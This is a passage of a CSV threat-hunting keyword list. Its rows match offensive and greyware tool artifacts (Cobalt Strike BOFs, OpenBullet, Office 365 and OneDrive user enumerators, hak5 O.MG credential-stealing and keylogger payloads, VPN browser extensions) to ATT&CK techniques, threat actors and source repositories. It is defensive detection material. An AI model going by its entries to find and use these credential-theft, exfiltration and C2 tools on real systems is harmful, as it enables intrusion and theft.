APT29","C2","https://github.com/OG-Sadpanda/SharpZippo","1","1","N/A","10","10","55","10","2022-05-24T15:57:33Z","2022-05-24T15:52:31Z" +"*Oh365UserFinder.git*","offensive_tool_keyword","Oh365UserFinder","Oh365UserFinder is used for identifying valid o365 accounts and domains without the risk of account lockouts. The tool parses responses to identify the IfExistsResult flag is null or not. and responds appropriately if the user is valid. The tool will attempt to identify false positives based on response. and either automatically create a waiting period to allow the throttling value to reset. or warn the user to increase timeouts between attempts.","T1595 - T1592 - T1589 - T1591 - T1598","TA0004 - TA0005 - TA0010","N/A","N/A","Reconnaissance","https://github.com/dievus/Oh365UserFinder","1","1","N/A","N/A","5","468","84","2023-03-21T15:59:54Z","2021-11-16T22:59:04Z" +"*oh365userfinder.py*","offensive_tool_keyword","Oh365UserFinder","Oh365UserFinder is used for identifying valid o365 accounts and domains without the risk of account lockouts. The tool parses responses to identify the IfExistsResult flag is null or not. and responds appropriately if the user is valid. The tool will attempt to identify false positives based on response. and either automatically create a waiting period to allow the throttling value to reset. or warn the user to increase timeouts between attempts.","T1595 - T1592 - T1589 - T1591 - T1598","TA0004 - TA0005 - TA0010","N/A","N/A","Reconnaissance","https://github.com/dievus/Oh365UserFinder","1","1","N/A","N/A","5","468","84","2023-03-21T15:59:54Z","2021-11-16T22:59:04Z" +"*Oh365UserFinder-main*","offensive_tool_keyword","Oh365UserFinder","Oh365UserFinder is used for identifying valid o365 accounts and domains without the risk of account lockouts. The tool parses responses to identify the IfExistsResult flag is null or not. and responds appropriately if the user is valid. The tool will attempt to identify false positives based on response. 
and either automatically create a waiting period to allow the throttling value to reset. or warn the user to increase timeouts between attempts.","T1595 - T1592 - T1589 - T1591 - T1598","TA0004 - TA0005 - TA0010","N/A","N/A","Reconnaissance","https://github.com/dievus/Oh365UserFinder","1","1","N/A","N/A","5","468","84","2023-03-21T15:59:54Z","2021-11-16T22:59:04Z" +"*oifjbnnafapeiknapihcmpeodaeblbkn*","greyware_tool_keyword","rderzh VPN Proxy","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*OLDNamedPipeServer.ps1*","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","1","N/A","5","5","453","33","2023-08-23T09:34:06Z","2022-12-22T12:35:34Z" +"*OleViewDotNet.psd1*","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","N/A","Exploitation tools","https://github.com/cube0x0/KrbRelay","1","0","N/A","N/A","8","751","109","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z" +"*OlivierLaflamme/PyExec*","offensive_tool_keyword","PyExec","This is a very simple privilege escalation technique from admin to System. 
This is the same technique PSExec uses.","T1134 - T1055 - T1548.002","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/OlivierLaflamme/PyExec","1","1","N/A","9","1","10","6","2019-09-11T13:56:04Z","2019-09-11T13:54:15Z" +"*omdakjcmkglenbhjadbccaookpfjihpa*","greyware_tool_keyword","TunnelBear VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*-OMG-Credz-Plz*","offensive_tool_keyword","OMG-Credz-Plz","A script used to prompt the target to enter their creds to later be exfiltrated with dropbox.","T1056.002 - T1566.001 - T1567.002","TA0004 - TA0040 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz","1","1","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*OMGdump.zip*","offensive_tool_keyword","SamDumpCable","Dump users sam and system hive and exfiltrate them","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SamDumpCable","1","1","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*omghfjlpggmjjaagoclmmobgdodcjboh*","greyware_tool_keyword","Browsec VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" 
+"*OMGLoggerDecoder*","offensive_tool_keyword","OMGLogger","Key logger which sends each and every key stroke of target remotely/locally.","T1056.001 - T1562.001","TA0004 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/OMGLogger","1","1","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*omg-payloads*/payloads/*","offensive_tool_keyword","omg-payloads","Official payload library for the O.MG line of products from Mischief Gadgets","T1200 - T1095 - T1059.006 - T1027","TA0010 - TA0011","N/A","N/A","Hardware","https://github.com/hak5/omg-payloads","1","1","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*omg-payloads-master*","offensive_tool_keyword","omg-payloads","Official payload library for the O.MG line of products from Mischief Gadgets","T1200 - T1095 - T1059.006 - T1027","TA0010 - TA0011","N/A","N/A","Hardware","https://github.com/hak5/omg-payloads","1","1","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*OmriBaso/BesoToken*","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","1","N/A","10","1","91","11","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z" +"*On_Demand_C2.*","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - 
T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","10","10","297","54","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z" +"*On-Demand_C2_BOF.*","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","10","10","297","54","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z" +"*OnDemandC2Class.cs*","offensive_tool_keyword","cobaltstrike","Collection of beacon 
BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","10","10","297","54","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z" +"*onecloudemoji/CVE-2022-30190*","offensive_tool_keyword","POC","CVE-2022-30190 Follina POC","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/onecloudemoji/CVE-2022-30190","1","1","N/A","N/A","2","107","33","2022-05-31T09:35:37Z","2022-05-31T06:45:25Z" +"*OneDrive Enumerator*","offensive_tool_keyword","onedrive_user_enum","enumerate valid onedrive users","T1087 - T1110","TA0006","N/A","N/A","Network Exploitation tools","https://github.com/nyxgeek/onedrive_user_enum","1","1","N/A","N/A","5","490","73","2023-09-21T06:52:07Z","2019-03-05T08:54:38Z" +"*onedrive_enum.py*","offensive_tool_keyword","onedrive_user_enum","enumerate valid onedrive users","T1087 - T1110","TA0006","N/A","N/A","Network Exploitation 
tools","https://github.com/nyxgeek/onedrive_user_enum","1","1","N/A","N/A","5","490","73","2023-09-21T06:52:07Z","2019-03-05T08:54:38Z" +"*onedrive_exports_version_dll.txt*","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","9","3","282","41","2023-09-21T14:01:23Z","2023-05-15T13:02:54Z" +"*onedrive_user_enum.git*","offensive_tool_keyword","onedrive_user_enum","enumerate valid onedrive users","T1087 - T1110","TA0006","N/A","N/A","Network Exploitation tools","https://github.com/nyxgeek/onedrive_user_enum","1","1","N/A","N/A","5","490","73","2023-09-21T06:52:07Z","2019-03-05T08:54:38Z" +"*One-Lin3r*","offensive_tool_keyword","One-Lin3r","One-Lin3r is simple modular and light-weight framework gives you all the one-liners that you will need while penetration testing (Windows. Linux. 
macOS or even BSD systems) or hacking generally with a lot of new features to make all of this fully automated (ex: you won't even need to copy the one-liners).","T1059 - T1003 - T1053","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation tools","https://github.com/D4Vinci/One-Lin3r","1","1","N/A","N/A","10","1596","307","2022-02-10T18:17:57Z","2018-01-14T21:26:04Z" +"*onesixtyone -c *snmp_default_pass.txt*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*onesixtyone -c *wordlists/*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*onesixtyone -i * -c*","offensive_tool_keyword","onesixtyone","Fast SNMP scanner. onesixtyone takes a different approach to SNMP scanning. It takes advantage of the fact that SNMP is a connectionless protocol and sends all SNMP requests as fast as it can. Then the scanner waits for responses to come back and logs them in a fashion similar to Nmap ping sweeps","T1046 - T1018","TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/trailofbits/onesixtyone","1","0","N/A","N/A","5","416","86","2023-04-11T18:21:38Z","2014-02-07T17:02:49Z" +"*onesixtyone.1*","offensive_tool_keyword","onesixtyone","Fast SNMP scanner. onesixtyone takes a different approach to SNMP scanning. 
It takes advantage of the fact that SNMP is a connectionless protocol and sends all SNMP requests as fast as it can. Then the scanner waits for responses to come back and logs them in a fashion similar to Nmap ping sweeps","T1046 - T1018","TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/trailofbits/onesixtyone","1","1","N/A","N/A","5","416","86","2023-04-11T18:21:38Z","2014-02-07T17:02:49Z" +"*onesixtyone.git*","offensive_tool_keyword","onesixtyone","Fast SNMP scanner. onesixtyone takes a different approach to SNMP scanning. It takes advantage of the fact that SNMP is a connectionless protocol and sends all SNMP requests as fast as it can. Then the scanner waits for responses to come back and logs them in a fashion similar to Nmap ping sweeps","T1046 - T1018","TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/trailofbits/onesixtyone","1","1","N/A","N/A","5","416","86","2023-04-11T18:21:38Z","2014-02-07T17:02:49Z" +"*OnionScan*","offensive_tool_keyword","onionscan","OnionScan has two primary goals: We want to help operators of hidden services find and fix operational security issues with their services. We want to help them detect misconfigurations and we want to inspire a new generation of anonymity engineering projects to help make the world a more private place. Secondly we want to help researchers and investigators monitor and track Dark Web sites. In fact we want to make this as easy as possible. Not because we agree with the goals and motives of every investigation force out there - most often we don't. But by making these kinds of investigations easy. 
we hope to create a powerful incentive for new anonymity technology","T1589 - T1591 - T1596 - T1599","TA0011 - TA0012","N/A","N/A","Information Gathering","https://onionscan.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*oofgbpoabipfcfjapgnbbjjaenockbdp*","greyware_tool_keyword","SetupVPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*ookhnhpkphagefgdiemllfajmkdkcaim*","greyware_tool_keyword","iNinja VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*openBeaconBrowser*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 
- APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*openBeaconBrowser*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*openBeaconConsole*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - 
T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*openBeaconConsole*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*openbsd_softraid2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*OpenBullet.csproj*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/openbullet","1","1","N/A","10","10","1342","714","2023-02-24T16:29:01Z","2019-03-26T09:06:32Z" +"*OpenBullet.exe*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/openbullet","1","1","N/A","10","10","1342","714","2023-02-24T16:29:01Z","2019-03-26T09:06:32Z" +"*OpenBullet.pdb*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/openbullet","1","1","N/A","10","10","1342","714","2023-02-24T16:29:01Z","2019-03-26T09:06:32Z" +"*OpenBullet.sln*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/openbullet","1","1","N/A","10","10","1342","714","2023-02-24T16:29:01Z","2019-03-26T09:06:32Z" +"*OpenBullet.zip*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web 
Attacks","https://github.com/openbullet/openbullet","1","1","N/A","10","10","1342","714","2023-02-24T16:29:01Z","2019-03-26T09:06:32Z" +"*openbullet/openbullet*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/openbullet","1","1","N/A","10","10","1342","714","2023-02-24T16:29:01Z","2019-03-26T09:06:32Z" +"*OpenBullet2.Console.zip*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/OpenBullet2","1","1","N/A","10","10","1329","425","2023-10-04T18:54:15Z","2020-04-23T14:04:16Z" +"*OpenBullet2.Native.exe*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/OpenBullet2","1","1","N/A","10","10","1329","425","2023-10-04T18:54:15Z","2020-04-23T14:04:16Z" +"*OpenBullet2.Native.zip*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/OpenBullet2","1","1","N/A","10","10","1329","425","2023-10-04T18:54:15Z","2020-04-23T14:04:16Z" +"*OpenBullet2.zip*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/OpenBullet2","1","1","N/A","10","10","1329","425","2023-10-04T18:54:15Z","2020-04-23T14:04:16Z" +"*openbullet2:latest*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - 
TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/OpenBullet2","1","0","N/A","10","10","1329","425","2023-10-04T18:54:15Z","2020-04-23T14:04:16Z" +"*OpenBullet2-master*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/OpenBullet2","1","1","N/A","10","10","1329","425","2023-10-04T18:54:15Z","2020-04-23T14:04:16Z" +"*OpenBulletApp.cs*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/openbullet","1","1","N/A","10","10","1342","714","2023-02-24T16:29:01Z","2019-03-26T09:06:32Z" +"*OpenBulletCLI.csproj*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/openbullet","1","1","N/A","10","10","1342","714","2023-02-24T16:29:01Z","2019-03-26T09:06:32Z" +"*OpenBulletCLI.exe*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/openbullet","1","1","N/A","10","10","1342","714","2023-02-24T16:29:01Z","2019-03-26T09:06:32Z" +"*openbullet-master*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/openbullet","1","1","N/A","10","10","1342","714","2023-02-24T16:29:01Z","2019-03-26T09:06:32Z" +"*openBypassUACDialog*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - 
T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*openBypassUACDialog*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 